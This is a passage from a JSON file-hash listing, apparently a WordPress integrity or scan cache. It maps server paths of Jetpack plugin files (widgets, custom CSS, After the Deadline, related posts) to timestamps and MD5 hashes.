my\\/wp-content\\/plugins\\/jetpack\\/modules\\/widgets\\/gallery\\/js\\/admin.js\":{\"d\":1544704139,\"h\":\"3cb66198dc4c790b58d391eaf031e703\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/widgets\\/gallery\\/js\\/gallery.js\":{\"d\":1544704139,\"h\":\"065d00876c1c0ce6c84017403a92cd7e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/widgets\\/gallery\\/templates\\/form.php\":{\"d\":1544704139,\"h\":\"78fc19835a4058e01ec6cd8cff87e125\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/widgets\\/facebook-likebox\\/style.css\":{\"d\":1544704139,\"h\":\"c3d0405efa850b70d21c25e3d71a464e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/widgets\\/goodreads\\/css\\/rtl\\/goodreads-rtl.css\":{\"d\":1544704139,\"h\":\"1b8baf27b72a052c821a99849901e726\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/widgets\\/goodreads\\/css\\/goodreads.css\":{\"d\":1544704139,\"h\":\"b3c150310004ec7e30ebb95aa110c12e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/widgets\\/google-translate\\/google-translate.js\":{\"d\":1544704139,\"h\":\"fc58175141eef10ead1f0e57d6ec22bb\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/widgets\\/wordpress-post-widget\\/class.jetpack-display-posts-widget-base.php\":{\"d\":1544704139,\"h\":\"e5b0e54a7542ea245e98f53b1491035b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/widgets\\/wordpress-post-widget\\/style.css\":{\"d\":1544704139,\"h\":\"5fca33574369e7ab0897f4c470208cd5\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/widgets\\/wordpress-post-widget\\/class.jetpack-display-posts-widget.php\":{\"d\":1544704139,\"h\":\"6dc8903d494ef6b8d508d76f954294dc\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/widgets\\/search\\/css\\/search-widget-frontend.css\":{\"d\":1544704139,\"h\":\"df618799127981288d4ec891e555a751\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/widgets\\/search\\/css\\/search-widget-admin-ui.css\":{\"d\":1544704139,\"h\":\"530cd632fbe3101897b22baed513c46a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/widgets\\/search\\/js\\/search-widget-admin.js\":{\"d\":1544704139,\"h\":\"0af1b991428dfb1143b8ee3351302c00\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/widgets\\/search\\/js\\/search-widget.js\":{\"d\":1544704139,\"h\":\"b29a1545aaf44bd6bcfc5664b01594c6\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/widgets\\/simple-payments\\/form.php\":{\"d\":1544704139,\"h\":\"0db3c337683a9b32850fdf9451c10411\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/widgets\\/simple-payments\\/widget.php\":{\"d\":1544704139,\"h\":\"1385e6cf6508bcd616254f81dc192610\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/widgets\\/simple-payments\\/customizer.js\":{\"d\":1544704139,\"h\":\"0abe70e9ac2aafc333392ed8168ee10c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/widgets\\/simple-payments\\/style.css\":{\"d\":1544704139,\"h\":\"fd763bde6d85462b4422ddb6a30c2dba\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/widgets\\/simple-payments\\/admin-warning.php\":{\"d\":1544704139,\"h\":\"27da7f63775da9687f0a5463ff4b0002\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/widgets\\/simple-payments\\/customizer.css\":{\"d\":1544704139,\"h\":\"b3cdf1a8059cf01dc90db319ea6eaf12\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/widgets\\/social-media-icons\\/style.css\":{\"d\":1544704139,\"h\":\"9cc0a4151a00c01db72ad1d676d759e0\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/widgets\\/top-posts\\/style.css\":{\"d\":1544704139,\"h\":\"6f64a2d81a9463eacd680af4e8a868a3\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/widgets\\/social-icons.php\":{\"d\":1544704139,\"h\":\"d5d8f04102d3aec3c57416a75c28d57b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/widgets\\/internet-defense-league.php\":{\"d\":1544704139,\"h\":\"ecead028617750a64ead77673bcfcfc7\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/widgets\\/flickr.php\":{\"d\":1544704139,\"h\":\"c97cdd88be01252dbe8c8029ff25aac5\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/widgets\\/gallery.php\":{\"d\":1544704139,\"h\":\"3229f12fa34c6c6971280f880eba80f4\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/widgets\\/goodreads.php\":{\"d\":1544704139,\"h\":\"ce8b86b65132cbe4511fcf6c127832b2\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/widgets\\/twitter-timeline.php\":{\"d\":1544704139,\"h\":\"4a4014e6ab10a0527f3b59a655a28485\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/widgets\\/mailchimp.php\":{\"d\":1544704139,\"h\":\"4d086564be7ff24dffe14b3839fea774\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/widgets\\/top-posts.php\":{\"d\":1544704139,\"h\":\"ed123b5e4a55c7ed1b20a64ea241e024\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/widgets\\/googleplus-badge.php\":{\"d\":1544704139,\"h\":\"748f9f51b69c50af8c30c710225773fe\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/widgets\\/search.php\":{\"d\":1544704139,\"h\":\"c50375a6ba491821c9a957a0d7f8f31b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/widgets\\/gravatar-profile.php\":{\"d\":1544704139,\"h\":\"ad764140dbf9d5ef6a9802358577d90c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/widgets\\/blog-stats.php\":{\"d\":1544704139,\"h\":\"ff8d9f27572e4b4f65ca4b44a48b6df0\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/widgets\\/twitter-timeline-admin.js\":{\"d\":1544704139,\"h\":\"fa40e38038931372829d6a6b775190b7\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/widgets\\/eu-cookie-law.php\":{\"d\":1544704139,\"h\":\"400bdca6c9757f97a051e3c5b88d1707\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/widgets\\/gravatar-profile.css\":{\"d\":1544704139,\"h\":\"f50b0bdc35197851af321825ef5837ec\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/widgets\\/milestone.php\":{\"d\":1544704139,\"h\":\"51e0350b4cad36735ca8b900679b0b93\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/widgets\\/authors.php\":{\"d\":1544704139,\"h\":\"31f4215528f07059c9288b0dc8f39d65\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/widgets\\/contact-info.php\":{\"d\":1544704139,\"h\":\"d64ff118fb676df4adf02cb99f7b90fd\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/widgets\\/upcoming-events.php\":{\"d\":1544704139,\"h\":\"3a09fee359f61bc075613138b4087077\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/widgets\\/google-translate.php\":{\"d\":1544704139,\"h\":\"27637a513faa01679015ff136275d7c1\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/widgets\\/my-community.php\":{\"d\":1544704139,\"h\":\"148e819385ee379b118985a402efe1f4\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/widgets\\/image-widget.php\":{\"d\":1544704139,\"h\":\"0392cd3f4afc4812c6e8239d9f1f7265\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/widgets\\/wordpress-post-widget.php\":{\"d\":1544704139,\"h\":\"51ea4362ecb4989ff01d4d58acd79aec\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/widgets\\/customizer-utils.js\":{\"d\":1544704139,\"h\":\"319c3749dcc13fcca2abb6b2f128b6a5\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/widgets\\/rsslinks-widget.php\":{\"d\":1544704139,\"h\":\"8972859360633395c7107730c700c9ce\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/widgets\\/social-media-icons.php\":{\"d\":1544704139,\"h\":\"8fbb3831ada565edb710dcab70b6a38c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/widgets\\/simple-payments.php\":{\"d\":1544704139,\"h\":\"0d97b23646f857294c391a4c6ee7cd56\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/widgets\\/facebook-likebox.php\":{\"d\":1544704139,\"h\":\"006495f4094a8ca1ab0cf2ca7eca156e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/widgets\\/customizer-controls.css\":{\"d\":1544704139,\"h\":\"bb782fd08c7a61fcede1a86a11bf53da\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/custom-css\\/custom-css\\/css\\/rtl\\/codemirror-rtl.css\":{\"d\":1544704139,\"h\":\"535fbba812af1ae8d7999c67c214d00f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/custom-css\\/custom-css\\/css\\/customizer-control.css\":{\"d\":1544704139,\"h\":\"2d5392990d209d32780301c012be9539\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/custom-css\\/custom-css\\/css\\/css-editor.css\":{\"d\":1544704139,\"h\":\"75f9671ebb6cffd94fce10a433bd316d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/custom-css\\/custom-css\\/css\\/css-editor-rtl.min.css\":{\"d\":1544704139,\"h\":\"8b945163fcb1b0302fe00ea118d81eb5\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/custom-css\\/custom-css\\/css\\/codemirror.min.css\":{\"d\":1544704139,\"h\":\"061656c0c4072567aa4b497c01edb253\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/custom-css\\/custom-css\\/css\\/codemirror-rtl.min.css\":{\"d\":1544704139,\"h\":\"33dc3fcc86fa83f47764fae6a8b0ab58\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/custom-css\\/custom-css\\/css\\/use-codemirror-rtl.css\":{\"d\":1544704139,\"h\":\"2677fb32de4bee680bf24b4601369770\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/custom-css\\/custom-css\\/css\\/codemirror.css\":{\"d\":1544704139,\"h\":\"6c1ea387afd68e43d258edcb7343e4d7\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/custom-css\\/custom-css\\/css\\/use-codemirror-rtl.min.css\":{\"d\":1544704139,\"h\":\"cfa365a630347242e1711ff87492721a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/custom-css\\/custom-css\\/css\\/codemirror-rtl.css\":{\"d\":1544704139,\"h\":\"487d4cf0c7e35d068d0a18ea68e0216a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/custom-css\\/custom-css\\/css\\/blank.css\":{\"d\":1544704139,\"h\":\"750e2b14c260d45039edd2046466b4cb\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/custom-css\\/custom-css\\/css\\/css-editor.min.css\":{\"d\":1544704139,\"h\":\"6775994007eba6cb825b3e0f21d86a11\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/custom-css\\/custom-css\\/css\\/use-codemirror.css\":{\"d\":1544704139,\"h\":\"611290d83893075786096a209c405cab\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/custom-css\\/custom-css\\/css\\/use-codemirror.min.css\":{\"d\":1544704139,\"h\":\"2de3773b2417b26c966868b06d131286\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/custom-css\\/custom-css\\/css\\/css-editor-rtl.css\":{\"d\":1544704139,\"h\":\"9c5b06dbb2e77a1b9cb4913d91bc39d4\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/custom-css\\/custom-css\\/preprocessors\\/lessc.inc.php\":{\"d\":1544704139,\"h\":\"8bdb22ea6221905ec031dfe4d53384d9\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/custom-css\\/custom-css\\/preprocessors\\/scss.inc.php\":{\"d\":1544704139,\"h\":\"c7a02b97c9f5e644d2824263686cc5c1\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/custom-css\\/custom-css\\/js\\/core-customizer-css-preview.js\":{\"d\":1544704139,\"h\":\"4b5c44bdfbb37549f5bc7d64ef1f4142\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/custom-css\\/custom-css\\/js\\/use-codemirror.js\":{\"d\":1544704139,\"h\":\"abf4ad25b43ba85f5248b640b2d12f0b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/custom-css\\/custom-css\\/js\\/core-customizer-css.core-4.9.js\":{\"d\":1544704139,\"h\":\"9118be087061b5c130a0e621f5d8b112\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/custom-css\\/custom-css\\/js\\/css-editor.js\":{\"d\":1544704139,\"h\":\"1bc72fe768e75665f94a4dda651ee9de\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/custom-css\\/custom-css\\/js\\/core-customizer-css.js\":{\"d\":1544704139,\"h\":\"13428a42478627c6de7da1d8baa5c997\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/custom-css\\/custom-css\\/js\\/codemirror.min.js\":{\"d\":1544704139,\"h\":\"9588d05e861deeed2b4bf3a05579662e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/custom-css\\/custom-css\\/preprocessors.php\":{\"d\":1544704139,\"h\":\"5b264a91c37016e2d255446330f560e6\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/custom-css\\/csstidy\\/data-wp.inc.php\":{\"d\":1544704139,\"h\":\"203515d5123df38c49f06aacc704612b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/custom-css\\/csstidy\\/cssparsed.min.css\":{\"d\":1544704139,\"h\":\"6bc985efa8d3f450bd116b2159bff529\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/custom-css\\/csstidy\\/cssparsed-rtl.min.css\":{\"d\":1544704139,\"h\":\"ddcdcc993c8647e406c20f6d17f3437e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/custom-css\\/csstidy\\/class.csstidy_ctype.php\":{\"d\":1544704139,\"h\":\"f7797be88e38dead1b39edbf3f2b2d9e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/custom-css\\/csstidy\\/cssparsed-rtl.css\":{\"d\":1544704139,\"h\":\"867fb730341a81b52560ef607c806b81\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/custom-css\\/csstidy\\/data.inc.php\":{\"d\":1544704143,\"h\":\"183f3076cbc3a6709d39ba253805b180\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/custom-css\\/csstidy\\/cssparse-rtl.css\":{\"d\":1544704143,\"h\":\"352ba6b8af140c48ffb747cd703554fa\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/custom-css\\/csstidy\\/cssparse.min.css\":{\"d\":1544704143,\"h\":\"4e2177c95b2ad98dfd9177f6b0e6f373\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/custom-css\\/csstidy\\/class.csstidy_print.php\":{\"d\":1544704143,\"h\":\"af55488f8cba37f6ce94410541b92c17\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/custom-css\\/csstidy\\/cssparsed.css\":{\"d\":1544704143,\"h\":\"3a0c24612040d104f7bf02a422133d06\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/custom-css\\/csstidy\\/cssparse-rtl.min.css\":{\"d\":1544704143,\"h\":\"b054cf86318fdb9ee5566ea1f3ed55c4\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/custom-css\\/csstidy\\/lang.inc.php\":{\"d\":1544704143,\"h\":\"0f5c1cc6c9fe9a7670da3a54b681e3c6\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/custom-css\\/csstidy\\/class.csstidy.php\":{\"d\":1544704143,\"h\":\"de2f26d29bb3e3be1b01299c97c85042\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/custom-css\\/csstidy\\/cssparse.css\":{\"d\":1544704143,\"h\":\"61ff16102be6b9044b483385539dbff6\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/custom-css\\/csstidy\\/wordpress-standard.tpl\":{\"d\":1544704143,\"h\":\"09a3f56584c7d638fc7ff45e75ebee19\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/custom-css\\/csstidy\\/class.csstidy_optimise.php\":{\"d\":1544704143,\"h\":\"b6a22fe768a8399e6a9a5af233f0c465\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/custom-css\\/custom-css.php\":{\"d\":1544704143,\"h\":\"4ecdd929c063d7049db19b589bba46ba\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/custom-css\\/migrate-to-core.php\":{\"d\":1544704143,\"h\":\"6a22b3c10f8382d11aa49933d034f528\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/custom-css\\/custom-css-4.7.php\":{\"d\":1544704143,\"h\":\"165fcada89c41f5c731c533f872c5eee\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/after-the-deadline\\/tinymce\\/css\\/content-rtl.css\":{\"d\":1544704143,\"h\":\"2d17cfa497964aab91a17e830926c4b6\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/after-the-deadline\\/tinymce\\/css\\/content-rtl.min.css\":{\"d\":1544704143,\"h\":\"cd53f215210f6c2fdc50232232362abf\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/after-the-deadline\\/tinymce\\/css\\/content.css\":{\"d\":1544704143,\"h\":\"190eafe3fca3c841f76db8f20173dddf\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/after-the-deadline\\/tinymce\\/css\\/content.min.css\":{\"d\":1544704143,\"h\":\"a9d3ac37383d63a8f3d12c851c761ce5\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/after-the-deadline\\/tinymce\\/editor_plugin.js\":{\"d\":1544704143,\"h\":\"8f09f1405f89269909a7e05cf8917b1a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/after-the-deadline\\/tinymce\\/plugin.js\":{\"d\":1544704143,\"h\":\"8bd40ef9c876f1dcd8de74e64e0503fa\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/after-the-deadline\\/rtl\\/atd-rtl.css\":{\"d\":1544704143,\"h\":\"256b5d43d8917fe5262a10f5024805af\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/after-the-deadline\\/config-unignore.php\":{\"d\":1544704143,\"h\":\"e0a3a120b58150fbab27f790a1ad36fe\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/after-the-deadline\\/atd-autoproofread.js\":{\"d\":1544704143,\"h\":\"89b66ad81ad11227f7c4b13d157a4b5e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/after-the-deadline\\/atd.core.js\":{\"d\":1544704143,\"h\":\"58d2c7fea27bddc74943ebf680474126\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/after-the-deadline\\/atd-nonvis-editor-plugin.js\":{\"d\":1544704143,\"h\":\"b758ac2c1b3dcd4145273ceee65cd58c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/after-the-deadline\\/atd-rtl.min.css\":{\"d\":1544704143,\"h\":\"60094663ca70223289eaf41fbe7e38ae\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/after-the-deadline\\/jquery.atd.js\":{\"d\":1544704143,\"h\":\"f9f469c8e2ede22b945a73395410ee3d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/after-the-deadline\\/atd-rtl.css\":{\"d\":1544704143,\"h\":\"4354b822e81d011733c41d0ad608814b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/after-the-deadline\\/atd.min.css\":{\"d\":1544704143,\"h\":\"b0bead142e6befcccee4c06d43a60061\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/after-the-deadline\\/config-options.php\":{\"d\":1544704143,\"h\":\"2dcafa9a1ced2708f2d53bc3b68bf4da\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/after-the-deadline\\/proxy.php\":{\"d\":1544704143,\"h\":\"d2bd7d7664ad02244edf24fa9e353914\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/after-the-deadline\\/atd.css\":{\"d\":1544704143,\"h\":\"7393ffbbb368701ff6c02c3ed4cbfd7e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/related-posts\\/rtl\\/related-posts-rtl.css\":{\"d\":1544704143,\"h\":\"104e87b723d9ae16c4c5be4fdb389f4c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/related-posts\\/jetpack-related-posts.php\":{\"d\":1544704143,\"h\":\"4f1a8d87415c5f124a6ee122118c84c5\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/related-posts\\/related-posts.css\":{\"d\":1544704143,\"h\":\"1d2c2ff980f58dd1c4d3191579a1add7\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/related-posts\\/related-posts-rtl.css\":{\"d\":1544704143,\"h\":\"14cb8ef60f3ba37558ed9a821c1e2b38\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/related-posts\\/related-posts-customizer.js\":{\"d\":1544704143,\"h\":\"6dee27a5c3ea5267a78182f058eb7c48\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/related-posts\\/related-posts.js\":{\"d\":1544704143,\"h\":\"3d5a1abc2ec00abff63116458d293bef\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/related-posts\\/class.related-posts-customize.php\":{\"d\":1544704143,\"h\":\"019da0bb68d4d77883648d0aeabaed0e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/widget-visibility\\/widget-conditions\\/rtl\\/widget-conditions-rtl.css\":{\"d\":1544704143,\"h\":\"395b7a2eeba356d6047b5a742228b1bd\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/widget-visibility\\/widget-conditions\\/widget-conditions-rtl.min.css\":{\"d\":1544704143,\"h\":\"9dd6940637eb2439cd5c8d6f1c74b8a1\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/widget-visibility\\/widget-conditions\\/widget-conditions.min.css\":{\"d\":1544704143,\"h\":\"dc88bf5a3fc6682ebcca7fd6dcf7fdb8\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/widget-visibility\\/wi